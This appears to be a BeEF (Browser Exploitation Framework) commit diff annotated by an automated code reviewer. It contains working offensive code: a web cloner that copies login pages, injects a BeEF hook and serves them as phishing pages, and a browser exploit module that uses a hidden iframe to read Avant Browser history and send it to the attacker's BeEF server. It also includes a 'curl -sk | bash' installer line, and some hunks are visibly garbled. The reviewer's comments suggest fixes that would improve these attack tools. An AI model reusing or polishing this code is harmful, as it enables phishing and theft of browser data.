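Review bot: Every per-page value this class reads — `settings.cloned_page`, `settings.redirect_to`, `settings.frameable`, `settings.db_entry` — is class-level Sinatra state, while web_cloner.rb (the next hunk) calls `interceptor.set ...` and then mounts a fresh `interceptor.new` per cloned page; cloning a second page therefore overwrites the settings of the first, and every mount serves the last cloned page. Per-mount state needs a distinct class per clone, e.g. `klass = Sinatra.new(Interceptor)` followed by `klass.set ...` and `@http_server.mount(mount, klass.new)` on the web_cloner.rb side, or the values should be passed through the constructor. The POST handler writes the full request body to the log with `print_info data` and stores it unbounded in `post_data`; truncating what is logged and stating in a comment that the body is persisted verbatim would make that behaviour explicit to whoever operates the server. The string returned in the frameable branch has its markup stripped in this rendering, so I could not review it.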
@@ -0,0 +1,186 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Extension
+ module SocialEngineering
+ class WebCloner
+ include Singleton
+
+
+ def initialize
+ @http_server = BeEF::Core::Server.instance
+ @config = BeEF::Core::Configuration.instance
+ @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
+ @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
+ end
+
+ def clone_page(url, mount, use_existing)
+ print_info "Cloning page at URL #{url}"
+ uri = URI(url)
+ output = uri.host
+ output_mod = "#{output}_mod"
+ user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
+
+ success = false
+
+ # Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
+ # there is no need to implement the complex logic to handle all different cases.
+ # We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
+ # So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
+ # 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
+ # - the user modify the example.com_mod file manually
+ # 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
+ #
+ if use_existing.nil? || use_existing == false
+ begin #,"--background"
+ IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end
+ success = true
+ rescue Exception => e
+ print_error "Errors executing wget: #{e}"
+ print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
+ end
+
+ if success
+ File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
+ File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
+ # Modify the line changing the action URI to / in order to be properly intercepted by BeEF
+ if line.include?("") || line.include?("")) && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
+ out_file.print add_beef_hook(line)
+ print_info "BeEF hook added :-D"
+ else
+ out_file.print line
+ end
+ end
+ end
+ end
+
+ if File.size("#{@cloned_pages_dir + output}") > 0
+ print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
+
+ file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
+
+ # if the user wants to clone http://a.com/login.jsp?cas=true&ciccio=false , split the URL mounting only the path.
+ # then the phishing link can be used anyway with all the proper parameters to looks legit.
+ if mount.include?("?")
+ mount = mount.split("?").first
+ print_info "Normalizing mount point. You can still use params for the phishing link."
+ end
+
+ # Check if the original URL can be framed
+ frameable = is_frameable(url)
+
+ interceptor = BeEF::Extension::SocialEngineering::Interceptor
+ interceptor.set :redirect_to, url
+ interceptor.set :frameable, frameable
+ interceptor.set :beef_hook, @beef_hook
+ interceptor.set :cloned_page, get_page_content(file_path)
+ interceptor.set :db_entry, persist_page(url,mount)
+
+ @http_server.mount("#{mount}", interceptor.new)
+ print_info "Mounting cloned page on URL [#{mount}]"
+ @http_server.remap
+ success = true
+ else
+ print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
+ success = false
+ end
+
+ success
+ end
+
+ private
+ # Replace with
+ def add_beef_hook(line)
+ if line.include?("")
+ line.gsub!("","\n")
+ elsif
+ line.gsub!("","\n")
+ end
+ line
+ end
+
+ private
+ # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
+ def is_frameable(url)
+ result = true
+ begin
+ uri = URI(url)
+ http = Net::HTTP.new(uri.host, uri.port)
+ if uri.scheme == "https"
+ http.use_ssl = true
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+ end
+ request = Net::HTTP::Get.new(uri.request_uri)
+ response = http.request(request)
+ frame_opt = response["X-Frame-Options"]
+
+ if frame_opt != nil
+ if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
+ result = false
+ end
+ end
+ print_info "Page can be framed: [#{result}]"
+ rescue Exception => e
+ result = false
+ print_error "Unable to determine if page can be framed. Page can be framed: [#{result}]"
+ print_debug e
+ #print_debug e.backtrace
+ end
+ result
+ end
+
+ def get_page_content(file_path)
+ file = File.open(file_path,'r')
+ cloned_page = file.read
+ file.close
+ cloned_page
+ end
+
+ def persist_page(uri, mount)
+ webcloner_db = BeEF::Core::Models::Webcloner.new(
+ :uri => uri,
+ :mount => mount
+ )
+ webcloner_db.save
+ webcloner_db
+ end
+
+ end
+ end
+ end
+end
+
diff --git a/extensions/xssrays/api.rb b/extensions/xssrays/api.rb
index ee98ed8e0..7a7ebbcd8 100644
--- a/extensions/xssrays/api.rb
+++ b/extensions/xssrays/api.rb
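Review bot: In `add_beef_hook` the `elsif` stands alone on its line, so Ruby parses the following `line.gsub!(...)` as the condition and gives the branch an empty body; it only works because `gsub!` mutates `line` as a side effect, and the keyword should be `else`. `File.open("#{@cloned_pages_dir + output}", 'r').each do |line|` never closes the handle; `File.foreach("#{@cloned_pages_dir + output}") do |line|` is the drop-in fix. The `IO.popen` block sets `success = true` without consulting `$?.success?`, and when wget produced no file the later `File.size(...)` raises `Errno::ENOENT` outside any rescue, so a failed download surfaces as an unhandled exception instead of the intended error message. `is_frameable` sets `OpenSSL::SSL::VERIFY_NONE` and inspects only `X-Frame-Options`, so its answer is both unverified and incomplete (`Content-Security-Policy: frame-ancestors` is not considered); the comment above it should say so, not just that framebusting code is not checked. The line beginning `if line.include?("")` is visibly garbled in this rendering (roughly thirty lines of the hunk are missing around it), so the form-rewriting branch itself could not be reviewed.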
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb index ce5d31548..7d7e54e30 100644 --- a/extensions/xssrays/api/scan.rb +++ b/extensions/xssrays/api/scan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension 
@@ -53,19 +43,9 @@ module BeEF
 # todo antisnatchor: remove this gsub crap adding some hook packing.
 if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
 content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('//
- // Copyright 2012 Wade Alcorn wade@bindshell.net
- //
- // Licensed under the Apache License, Version 2.0 (the "License");
- // you may not use this file except in compliance with the License.
- // You may obtain a copy of the License at
- //
- // http://www.apache.org/licenses/LICENSE-2.0
- //
- // Unless required by applicable law or agreed to in writing, software
- // distributed under the License is distributed on an "AS IS" BASIS,
- // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- // See the License for the specific language governing permissions and
- // limitations under the License.
+ // Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ // Browser Exploitation Framework (BeEF) - http://beefproject.com
+ // See the file \'doc/COPYING\' for copying permission
 //', "")
 add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
 ws.send(content + @body,hb.session)
diff --git a/extensions/xssrays/config.yaml b/extensions/xssrays/config.yaml
index 84d136b5a..7fd63a847 100644
--- a/extensions/xssrays/config.yaml
+++ b/extensions/xssrays/config.yaml
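Review bot: The `gsub` that strips the license header from the `beef.net.xssrays` component still matches it as an exact literal, so this commit had to rewrite the literal to follow the new header, and any later edit to the header or its whitespace will silently leave the comment in the payload sent over the websocket; the todo above already flags the approach. Until hook packing replaces it, stripping the leading comment block with a pattern, e.g. `.sub(/\A(\s*\/\/.*\n)+/, "")`, would survive header edits. The enclosing `if` and its non-websocket branch continue outside the hunk.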
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/admin_ui/controllers/xssrays/xssrays.rb b/extensions/xssrays/controllers/xssrays.rb similarity index 87% rename from extensions/admin_ui/controllers/xssrays/xssrays.rb rename to extensions/xssrays/controllers/xssrays.rb index c951f62e5..a3805b0f6 100644 --- a/extensions/admin_ui/controllers/xssrays/xssrays.rb +++ b/extensions/xssrays/controllers/xssrays.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/extension.rb b/extensions/xssrays/extension.rb index 4c024aed9..a9ea9327d 100644 --- a/extensions/xssrays/extension.rb +++ b/extensions/xssrays/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb index 500e7965e..dee21397b 100644 --- a/extensions/xssrays/handler.rb 
+++ b/extensions/xssrays/handler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/models/xssraysdetail.rb b/extensions/xssrays/models/xssraysdetail.rb index 8201e7b91..8b312005e 100644 --- a/extensions/xssrays/models/xssraysdetail.rb +++ b/extensions/xssrays/models/xssraysdetail.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
diff --git a/extensions/xssrays/models/xssraysscan.rb b/extensions/xssrays/models/xssraysscan.rb index 544cb251b..24ded2b93 100644 --- a/extensions/xssrays/models/xssraysscan.rb +++ b/extensions/xssrays/models/xssraysscan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/install b/install index 62bf0534e..ef2831b90 100755 --- a/install +++ b/install 
@@ -1,19 +1,9 @@ #!/usr/bin/env ruby # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # puts "\nWelcome to the BeEF installer!" diff --git a/install-beef b/install-beef index 5428316c6..a9e42a0b5 100644 --- a/install-beef +++ b/install-beef @@ -1,20 +1,12 @@ #!/bin/bash # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # +set -e + clear echo "======================================" echo " BeEF Installer " 
@@ -86,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion -bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) +curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh new file mode 100644 index 000000000..ef4bb368d --- /dev/null +++ b/liveCD/BeEFLive.sh 
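Review bot: The new line pipes `curl -sk` straight into `bash`; `-k` disables certificate verification, so the RVM installer is executed with no check on what was fetched, and the `set -e` added in the earlier hunk of this file does not help because a failed `curl` is masked by `bash`'s exit status in the pipeline. Dropping `-k`, downloading to a file and running it in a second step (`tmp="$(mktemp)"`, `curl -sS -o "$tmp" https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer`, `bash "$tmp"`) makes both the verification and the failure visible; `set -o pipefail` next to `set -e` would cover the remaining pipelines. The `sudo apt-get install ...` context line runs without `-y`, so under `set -e` a declined prompt now aborts the installer — presumably intended, but worth a comment.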
@@ -0,0 +1,311 @@
+#!/bin/bash
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'home/beef/doc/COPYING' for copying permission
+#
+
+
+#
+# This is the auto startup script for the BeEF Live CD.
+# IT SHOULD ONLY BE RUN ON THE LIVE CD
+# Download LiveCD here: http://downloads.beefproject.com/BeEFLive1.4.iso
+# MD5 (BeEFLive1.4.iso) = 5167450078ef5e9b8d146113cd4ba67c
+#
+# This script contains a few fixes to make BeEF play nicely with the way
+# remastersys creates the live cd distributable as well as generating host keys
+# to enable SSH etc. The script also make it easy for the user to update/start
+# the BeEF server
+#
+
+#
+# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
+# (if they do not yet exist)
+#
+f1="beef"
+if [ -f $f1 ] ; then
+ echo ""
+else
+ ln -s /opt/beef/ beef
+ ln -s /opt/metasploit-framework/ msf
+ ln -s /opt/sqlmap/ sqlmap
+fi
+
+#
+# function to allow BeEF to run in the background
+#
+run_beef() {
+ cd /opt/beef/
+ ruby beef -x
+}
+
+#
+# function to start msf and run in the background
+#
+run_msf() {
+ # start msf
+ /opt/metasploit-framework/msfconsole -r /opt/beef/test/thirdparty/msf/unit/BeEF.rc 2> /dev/null
+}
+
+#
+# functions to enable or disable msf integration
+#
+enable_msf() {
+ # enable msf integration in main config file
+ sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\sfalse/metasploit:\n enable: true/g;P;D' /opt/beef/config.yaml
+ # enable auto_msfrpcd
+ sed -i 's/auto_msfrpcd:\sfalse/auto_msfrpcd: true/g' /opt/beef/extensions/metasploit/config.yaml
+}
+disable_msf() {
+ # disable msf integration in main config file
+ sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\strue/metasploit:\n enable: false/g;P;D' /opt/beef/config.yaml
+ # disable auto_msfrpcd
+ sed -i 's/auto_msfrpcd:\strue/auto_msfrpcd: false/g' /opt/beef/extensions/metasploit/config.yaml
+}
+
+#
+# function to exit cleanly
+#
+# trap ctrl-c and call close_bash()
+trap close_bash_t INT
+
+close_bash_t() {
+ # beef would have quit
+ back_running="0"
+ close_bash
+}
+close_bash() {
+ echo ""
+ echo "Are you sure you want to exit the LiveCD? (y/N): "
+ read var
+ if [ $var = "y" ] ; then
+ disable_msf
+ exit
+ else
+ show_menu
+ fi
+}
+
+# set default values
+bac="0"
+
+
+
+#
+# User Menu Loop
+#
+show_menu() {
+ while true; do
+ clear
+ echo "======================================"
+ echo " BeEF Live CD "
+ echo "======================================"
+ echo ""
+ echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
+ echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+ echo "See the file 'home/beef/doc/COPYING' for copying permission"
+ echo ""
+
+ echo "Welcome to the BeEF Live CD"
+ echo ""
+
+
+ #
+ # Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled
+ # (remastersys has a habit of deleting them during Live CD Creation)
+ #
+ f1="/etc/ssh/ssh_host_rsa_key"
+ if [ -f $f1 ] ; then
+ echo "[1] Disable SSH [Currently Enabled]"
+ echo -ne " beef@"
+ ifconfig | awk -F "[: ]+" '/inet addr:/ { if ($4 != "127.0.0.1") print $4 }'
+ else
+ echo "[1] Enable SSH [Currently Disabled]"
+ fi
+
+ echo "[2] Update BeEF"
+ echo "[3] Update sqlMap (Bundled with LiveCD)"
+ echo "[4] Update metasploit-framework (Bundled with LiveCD)"
+ echo ""
+ if [ "$bac" = "1" ] ; then
+ echo "[5] Disable BeEF in background mode [Currently Enabled]"
+ else
+ echo "[5] Enable BeEF in background mode [Currently Disabled]"
+ fi
+
+ if [ "$sqlm" = "1" ] ; then
+ echo "[6] Disable sqlMap demo [Currently Enabled]"
+ else
+ echo "[6] Enable sqlMap demo [Currently Disabled]"
+ fi
+
+ if [ "$msf" = "1" ] ; then
+ echo "[7] Disable metasploit-framework integration [Currently Enabled]"
+ else
+ echo "[7] Enable metasploit-framework integration [Currently Disabled]"
+ fi
+ echo ""
+ echo "[q] Quit to terminal"
+ echo ""
+ if [ "$back_running" = "1" ] ; then
+ echo "[k] End BeEF process [BeEF running in background mode]"
+ else
+ echo "[b] Run BeEF"
+ fi
+ echo ""
+ echo -n "BeEF Live ~# "
+ read var
+
+ #
+ # Quit liveCD loop
+ #
+ if [ $var = "q" ] ; then
+ close_bash
+ fi
+
+ #
+ # Create SSH Keys to enable SSH or Delete the Keys to disable
+ #
+ if [ $var = "1" ] ; then
+ if [ -f $f1 ]
+ then
+ sudo rm /etc/ssh/ssh_host_rsa_key
+ sudo rm /etc/ssh/ssh_host_dsa_key
+ else
+ sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+ sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+ echo ""
+ echo "Please provide a password for ssh user: beef"
+ sudo passwd beef
+ echo "ssh enabled"
+ fi
+ fi
+
+ #
+ # Update BeEF from github repository
+ #
+ if [ $var = "2" ] ; then
+ cd /opt/beef
+ git stash
+ git pull
+ msf="0"
+ # check for new bundle requirements and update
+ bundle update
+ fi
+
+ #
+ # Update sqlmap from github repository
+ #
+ if [ $var = "3" ] ; then
+ cd /opt/sqlmap
+ git stash
+ git pull
+ fi
+
+ #
+ # Update msf from github repository
+ #
+ if [ $var = "4" ] ; then
+ cd /opt/metasploit-framework
+ git stash
+ git pull
+ fi
+
+ #
+ # set BeEF to run in the background
+ #
+ if [ $var = "5" ] ; then
+ if [ "$bac" = "1" ] ; then
+ bac="0"
+ # check and disable sqlmap (requires beef run in the background)
+ sqlm="0"
+ else
+ bac="1"
+ fi
+ fi
+
+ #
+ # enable the sqlmap demo
+ #
+ if [ $var = "6" ] ; then
+ if [ "$sqlm" = "1" ] ; then
+ sqlm="0"
+ else
+ sqlm="1"
+ # requires BeEF be run in the background
+ bac="1"
+ fi
+ fi
+
+ #
+ # enable the msf integration
+ #
+ if [ $var = "7" ] ; then
+ if [ "$msf" = "1" ] ; then
+ msf="0"
+ disable_msf
+ else
+ msf="1"
+ enable_msf
+ fi
+ fi
+
+ #
+ # end background beef process
+ #
+ if [ $var = "k" ] ; then
+ pkill -x 'ruby'
+ back_running="0"
+ fi
+
+ #
+ # Run BeEF
+ #
+ if [ $var = "b" ] ; then
+
+ if [ "$msf" = "1" ] ; then
+ #
+ # First start msf if it is enabled
+ #
+ printf "Starting MSF (wait 45 seconds)..."
+ run_msf &
+ sleep 45
+ fi
+
+ if [ "$bac" = "1" ] ; then
+ #
+ # run beef in the background
+ #
+ run_beef &
+ sleep 5
+ echo ""
+ echo "BeEF is running in the background, returning to the menu or running something else now..."
+ sleep 15
+ back_running="1"
+ #
+ # If the user has enabled it start sqlmap using beef as proxy
+ #
+ if [ $sqlm = "1" ] ; then
+ echo ""
+ echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:"
+ echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard"
+ sleep 5
+ python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard
+ fi
+ else
+ #
+ # run beef in the foreground
+ #
+ cd /opt/beef/
+ ruby beef -x
+ fi
+ fi
+
+ done
+}
+
+# show user menu
+show_menu
+
+
+
diff --git a/liveCD/isolinux.txt b/liveCD/isolinux.txt
new file mode 100644
index 000000000..76cdda09e
--- /dev/null
+++ b/liveCD/isolinux.txt
@@ -0,0 +1,34 @@
+default vesamenu.c32
+prompt 0
+timeout 100
+
+menu title BeEF Live CD
+menu background splash.png
+menu color title 1;37;44 #c0ffffff #00000000 std
+
+label live
+ menu label live - BeEF Beef Live
+ kernel /casper/vmlinuz
+ append file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash --
+
+label xforcevesa
+ menu label xforcevesa - boot Live in safe graphics mode
+ kernel /casper/vmlinuz
+ append file=/cdrom/preseed/custom.seed boot=casper xforcevesa initrd=/casper/initrd.gz quiet splash --
+
+label install
+ menu label install - start the installer directly
+ kernel /casper/vmlinuz
+ append file=/cdrom/preseed/custom.seed boot=casper only-ubiquity initrd=/casper/initrd.gz quiet splash --
+
+label memtest
+ menu label memtest - Run memtest
+ kernel /install/memtest
+ append -
+
+label hd
+ menu label hd - boot the first hard disk
+ localboot 0x80
+ append -
+
+
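Review bot: Every menu test in `show_menu` uses an unquoted `[ $var = "q" ]`, so pressing Enter with no input expands to `[ = "q" ]` and bash prints a unary-operator error for each branch instead of redrawing the menu; quote it as `if [ "$var" = "q" ] ; then` (same for `close_bash`'s `[ $var = "y" ]` and the `[ $sqlm = "1" ]` test). The `[k]` option runs `pkill -x 'ruby'`, which ends every ruby process on the machine rather than the server started by `run_beef &`; capturing `beef_pid=$!` right after that line and using `kill "$beef_pid"` limits it to the process this script started. `close_bash` also calls `show_menu` again when the user answers anything but "y", which starts a second `while true` loop nested inside the one it was called from instead of returning to it.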
diff --git a/liveCD/splash.png b/liveCD/splash.png
new file mode 100644
index 000000000..8f1965468
Binary files /dev/null and b/liveCD/splash.png differ
diff --git a/modules/browser/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js
new file mode 100644
index 000000000..faefeaf2b
--- /dev/null
+++ b/modules/browser/avant_steal_history/command.js
@@ -0,0 +1,47 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ if (!beef.browser.isA()) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+ return;
+ }
+
+ var avant_iframe = document.createElement("iframe");
+ //var avant_iframe = beef.dom.createInvisibleIframe();
+ avant_iframe.setAttribute('src', 'browser:home');
+ avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>');
+ avant_iframe.setAttribute('width', '0');
+ avant_iframe.setAttribute('heigth', '0');
+ avant_iframe.setAttribute('scrolling','no');
+ avant_iframe.setAttribute('style', 'display:none');
+
+ document.body.appendChild(avant_iframe);
+
+ var vstr = {value: ""};
+
+ if (window['avant_history_<%= @command_id %>'].navigator) {
+ //This works if FF is the rendering engine
+ window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+ } else {
+ // this works if Chrome is the rendering engine
+ //window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
+ }
+
+});
+
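Review bot: `avant_iframe.setAttribute('heigth', '0')` misspells the attribute name, so no height is ever set on the frame and only the `display:none` style keeps it out of view; change it to `'height'`. The returned value is also concatenated unencoded into `"result="+vstr.value`, so if it contains `&` or `=` the parameter is presumably truncated at the server unless `beef.net.send` encodes its payload — worth confirming. This file also still carries the old Apache header that the rest of the commit replaces with the 2006-2013 notice.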
diff --git a/modules/browser/avant_steal_history/config.yaml b/modules/browser/avant_steal_history/config.yaml
new file mode 100644
index 000000000..bace4b5c0
--- /dev/null
+++ b/modules/browser/avant_steal_history/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
